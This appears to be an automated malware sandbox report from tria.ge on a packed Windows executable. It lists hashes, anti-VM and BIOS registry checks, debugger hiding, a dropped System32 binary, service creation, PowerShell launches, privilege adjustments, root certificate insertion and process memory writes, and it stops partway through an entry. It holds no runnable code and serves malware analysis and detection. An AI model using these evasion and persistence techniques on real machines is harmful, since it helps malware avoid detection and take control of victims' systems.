Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
87s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2023, 18:22
Static task
static1
Behavioral task
behavioral1
Sample
d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe
Resource
win10v2004-20230220-en
General
-
Target
d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe
-
Size
7.1MB
-
MD5
68557640db8a8e7225375079c5b74f58
-
SHA1
41b0182f4683af9ac1444393539cad5480379b4f
-
SHA256
d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227
-
SHA512
5253729192c55c74166ccc701e8440154970b8fc412b50b9d778f0bde9457e78babbe28c22e7384b5933f9406eb4ef0f6ce3031fe7284b5e29b775fc103e19e4
-
SSDEEP
98304:93EiL1pkOfylVETSX8zBVOzbtscJeikbAF5:1l5bFi8NVbbPkF5
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ r.exe -
Creates new service(s) 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion r.exe -
Executes dropped EXE 1 IoCs
pid Process 3248 r.exe -
resource yara_rule behavioral1/files/0x0011000000023155-178.dat themida behavioral1/files/0x0011000000023155-179.dat themida behavioral1/memory/3248-182-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-183-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-184-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-186-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-187-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-188-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-189-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-190-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-191-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/3248-192-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/files/0x0011000000023155-207.dat themida behavioral1/memory/5000-208-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-209-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-210-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-212-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-213-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-214-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-215-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-216-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-217-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/5000-218-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/files/0x0011000000023155-233.dat themida behavioral1/memory/4612-235-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida behavioral1/memory/4612-236-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\system32\r.exe d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3248 r.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1516 sc.exe 4768 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 3144 powershell.exe 3144 powershell.exe 4376 powershell.exe 4376 powershell.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeIncreaseQuotaPrivilege 3144 powershell.exe Token: SeSecurityPrivilege 3144 powershell.exe Token: SeTakeOwnershipPrivilege 3144 powershell.exe Token: SeLoadDriverPrivilege 3144 powershell.exe Token: SeSystemProfilePrivilege 3144 powershell.exe Token: SeSystemtimePrivilege 3144 powershell.exe Token: SeProfSingleProcessPrivilege 3144 powershell.exe Token: SeIncBasePriorityPrivilege 3144 powershell.exe Token: SeCreatePagefilePrivilege 3144 powershell.exe Token: SeBackupPrivilege 3144 powershell.exe Token: SeRestorePrivilege 3144 powershell.exe Token: SeShutdownPrivilege 3144 powershell.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeSystemEnvironmentPrivilege 3144 powershell.exe Token: SeRemoteShutdownPrivilege 3144 powershell.exe Token: SeUndockPrivilege 3144 powershell.exe Token: SeManageVolumePrivilege 3144 powershell.exe Token: 33 3144 powershell.exe Token: 34 3144 powershell.exe Token: 35 3144 powershell.exe Token: 36 3144 powershell.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 2112 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 3480 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1892 wrote to memory of 3144 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 85 PID 1892 wrote to memory of 3144 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 85 PID 1892 wrote to memory of 4376 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 87 PID 1892 wrote to memory of 4376 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 87 PID 1892 wrote to memory of 1516 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 91 PID 1892 wrote to memory of 1516 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 91 PID 1892 wrote to memory of 4768 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 93 PID 1892 wrote to memory of 4768 1892 d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe 93 PID 2112 wrote to memory 